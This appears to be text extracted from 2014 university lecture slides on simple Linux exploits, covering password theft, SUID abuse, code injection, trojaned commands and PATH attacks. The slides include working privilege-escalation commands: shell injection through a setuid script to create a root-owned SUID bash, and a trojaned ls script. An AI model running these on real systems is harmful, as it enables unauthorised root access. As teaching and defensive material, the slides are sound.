What do Hackers Want? Simple Exploits o Your data: credit card number, financial information, SSN, personal information. o Your disk: pirated software (warez), illegal copies of movies/videos, porn, ... Thursday/Monday, October 16/20, 2014 o Your CPU (e.g. to crack passwords) Reading: Hacking Linux Exposed o Your bandwidth: send spam, participate in botnet, stepping stone to other attacks. CS342 Computer Security o To deny resources to you or your customers: for blackmail, competition, revenge. Department of Computer Science Wellesley College o ⇒ To own (pwn)/root your machine (or at least your account) by exploiting vulnerabilities. Simple Exploits 12-2 Overview Essence of Exploits Goal: discuss typical vulnerabilities & exploits in Linux. o Study details/assumptions of system Understand these for PS4 Treasure Hunt problem! o elevation of privilege o Take advantage of details and violate assumptions! o password exploits (recall the Hacker Curriculum and Security Mindset). o incorrectly set permissions o US Postal System examples; (Note: do not try these!) o leveraging SUID/SGID programs o code injection • Can you send a letter without a stamp? o trojaned commands • Can you reuse a stamp? o PATH exploits o misspelling exploit o symbolic link exploits o document exploits o backdoor rootshells Simple Exploits 12-3 Simple Exploits 12-4 Elevation of Privilege Password Exploits Holy grail = rootshell, but the path there may be circuitious. If I know your password, I can be you on your computer. Also, may only need to get partially there. o Watch for passwords "sent in the clear" on network (especially wireless) guest o Find passwords stored unprotected on computer, perhaps in public files, emails, code, comments, logs, .bash_history, etc. The student permissions on some of these files might be set incorrectly. o Online password guessing (perhaps using knowledge of victim). faculty o Offline password cracking (e.g. John the ripper) -- must be able to read password file. sysadmin o Use passwords from keystroke logger o Social engineering: shoulder surfing, trick people to divulge root passwords, look at postits near computer, dumpster diving Simple Exploits 12-5 Simple Exploits 12-6 .bash_history file Use the source, Luke! "wendy@cs342-ubuntu-1:~$ cat ~/.bash_history Try to find and study the source code for potentially sudo emacs su – guest vulnerable programs: su – foo o In code, may find vulnerabilities like overflowable sudo emacs & buffers, overflowable numbers, code injection, wendy@cs342-ubuntu-1:~$ ls -al ~/.bash_history hardwired accounts and passwords, etc. -rw------- 1 wendy wendy 68 Sep 16 08:59 /homewendy/.bash_history o In comments, may find notes on potential vulnerabilities, passwords, etc. o Permissions are sometimes incorrectly set, so others can view this file. o Sometimes contains information valuable for attacker (e.g., passwords typed “out of phase”) o Sometimes contains forensic information for understanding an attack. Simple Exploits 12-7 Simple Exploits 12-8 SUID and SGID Program Attacks Simple SUID Example: mycat o Use Linux find command to find all accessible SUID and SGID o User lynux creates a secret file programs – prime targets for privilege escalation. [lynux@salmon exploits]$ echo "This is lynux's secret file" > secret.txt o Find source code for these programs to look for vulnerabilities. [lynux@salmon exploits]$ chmod 750 secret.txt o Disassemble and study object code. o To test SUID programs, user lynux makes an SUID copy of cat named o Use strace to study system calls made (don’t forget –f flag) mycat. Forgets to change permissions back. o Use Linux strings command to see strings in object code (e.g. [lynux@salmon exploits]$ which cat prompts, help messages, error messages, system functions linked /bin/cat to, etc.) [lynux@salmon exploits]$ cp /bin/cat mycat; chmod u+s mycat: ls -l mycat -rwsr-xr-x. 1 lynux lynux 48040 Sep 25 15:39 mycat o Experiment with SUID/SGID programs to find & exploit vulnerabilities: o Attacker gdome uses mycat to read lynuxs secret file • Use gleaned knowledge to craft diabolical inputs (for buffer [gdome@salmon exploits]$ cat secret.txt overflows, code injection, etc.) cat: secret.txt: Permission denied • Try boundary case and out-of-range inputs (e.g., negative [gdome@salmon exploits]$ ./mycat secret.txt numbers, large numbers, empty string, very long strings) This is lynux's secret file Simple Exploits 12-9 Simple Exploits 12-10 Another SUID Example Code Injection Exploits o User lynux writes SUID program ~/bin/submit username psetfile Bad guys can take advantage of shoddy input handling to execute arbitrary code as someone else. to submit student pset data files to ~/psets/username/psetfile. o Filename mangling from previous example. o The code for submit is essentially o Inject Linux commands into C programs that execute strings constructed write the contents of psetfile to the file whose name is the from user input. concatentation ~/psets/ + username + / + psetfile o Inject HTML and JavaScript into web pages that include user input in page (e.g., original Tanner photo contest site). o What kind of attacks can be made with this program? o Inject database commands into SQL programs: e.g., xkcd's "Exploits of a Mom": http://xkcd.com/327/ Simple Exploits 12-11 Simple Exploits 12-12 Code Injection: newpasswd Example Code Injection: newpasswd Example part 2 Suppose root tries to make command-line passwords (only available to Next, the machinations to make newpasswd setuid: root) available to everyone via a setuid script: #!/bin/bash –p // Contents of /root/newpasswd.c # contents of /root/newpasswd.sh int main (int argc, char* argv) { echo "Executing /root/newpasswd.sh" execv("/root/newpasswd.sh", argv); echo $1 | /usr/bin/passwd --stdin `whoami` } o In raw C, can use system to execute string argument in a shell: system ”echo $1 | /usr/bin/passwd --stdin `whoami`” [root@localhost ~]# gcc -o newpasswd newpasswd.c o Other ways to construct and execute code out of parts on the fly: [root@localhost ~]# cp newpasswd /usr/bin/newpasswd • C’s exec, execv, and execve [root@localhost ~]# chmod 4755 /usr/bin/newpasswd • eval in JavaScript, Python, PHP, Perl, and Lisp [root@localhost ~]$ ls -l /usr/bin/newpasswd o This code won't really work anyway because /usr/bin/passwd only -rwsr-xr-x 1 root root 4832 2008-09-23 06:16 /usr/bin/newpasswd allows the --stdin option for real UID root, not for effective UID root. But let's suppose root doesn't know this. o Ubuntu doesn’t support –-stdin option (but some other Linuxes do) Simple Exploits 12-13 Simple Exploits 12-14 Code Injection: newpasswd Example part 3 Code Injection: newpasswd Example part 4 Now gdome tries out newpasswd: [gdome@localhost ~]$ newpasswd foo; cp /bin/bash ~gdome/ mine; chmod 4755 ~gdome/mine; echo bar" [gdome@localhost ~]$ newpasswd foobar Executing /root/newpasswd.sh Executing /root/newpasswd.sh foo Only root can do that. Only root can do that. The underlying /usr/bin/passwd fails because real UID gdome != root. [gdome@localhost ~]$ ls -l mine But gdome can still do sneaky things! -rwsr-xr-x 1 root gdome 735004 2008-09-23 06:04 mine [gdome@localhost ~]$ newpasswd foo; echo bar; echo baz" [gdome@localhost ~]$ ./mine -p Executing /root/newpasswd.sh mine-3.2# whoami foo root bar Only root can do that. Simple Exploits 12-15 Simple Exploits 12-16 Preventing Code Injection Exploits Trojaned ls program o Dont directly execute input or embed it in system contexts #!/bin/bash (like filenames). # gdomes ~/bin/ls_trojan program o If you must use user input directly, first either # Make suid shell in /tmp/foo cp /bin/bash /tmp/foo • Verify that input doesnt contain problematic parts: chmod 4755 /tmp/foo ! semicolons in Linux commands # Now do what ls does ! .. or starting / in filenames exec ls "$@ ! unmatched string quotes, angle brackets (HTML), parens (Javascript) Now gdome tries to trick other users into running ! Code fragments (HTML, Javascript, …) her ls program in place of regular ls. • Sanitize input to remove problematic parts. Path attacks are one way to do this. Simple Exploits 12-17 Simple Exploits 12-18 Linux PATH variable: Prelude to An Exploit Overriding PATH with Absolute Pathnames Linux uses PATH variable to find executables. (This variable is set/changed in Can override PATH mechanism by giving absolute pathname ~/.bash_profile, ~/.bashrc) [lynux@localhost ~]$ which ~/bin/passwd [lynux@localhost ~]$ echo $PATH /usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin:. ~/bin/passwd Linux searches PATH in order to find an executable for a relative [gdome@localhost setuid]$ echo $PATH (non-absolute) pathname. Can see what it finds with which command. /usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/home/gdome/bin [lynux@localhost ~]$ which passwd /usr/bin/passwd [gdome@localhost setuid]$ which rootshell [lynux@localhost ~]$ which ls /usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin: /bin/ls /bin:/usr/bin:/home/gdome/bin) [lynux@localhost ~]$ which findit ~/bin/findit [gdome@localhost setuid]$ which ./rootshell [lynux@localhost ~]$ which rootshell ./rootshell /usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin:/usr/bin: /bin:.:/home/lynux/bin:.) [lynux@localhost ~]$ cd ~/cs342/download/setuid/ [lynux@localhost setuid]$ which rootshell ./rootshell Simple Exploits 12-19 Simple Exploits 12-20 Linux Path Exploit: PATH begins with . Avoiding Linux Path Exploit Suppose "." is at the beginning of PATH: Can avoid the above attack by putting "." at end of PATH or excluding it altogether. [lynux@localhost ~]$ export PATH=.:$PATH; echo $PATH .:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin ... lynux in a new shell after moving . to end of PATH … Nefarious gdome can trick lynux into running her trojaned ls program: [lynux@localhost ~]$ echo $PATH /usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/home/lynux/bin:.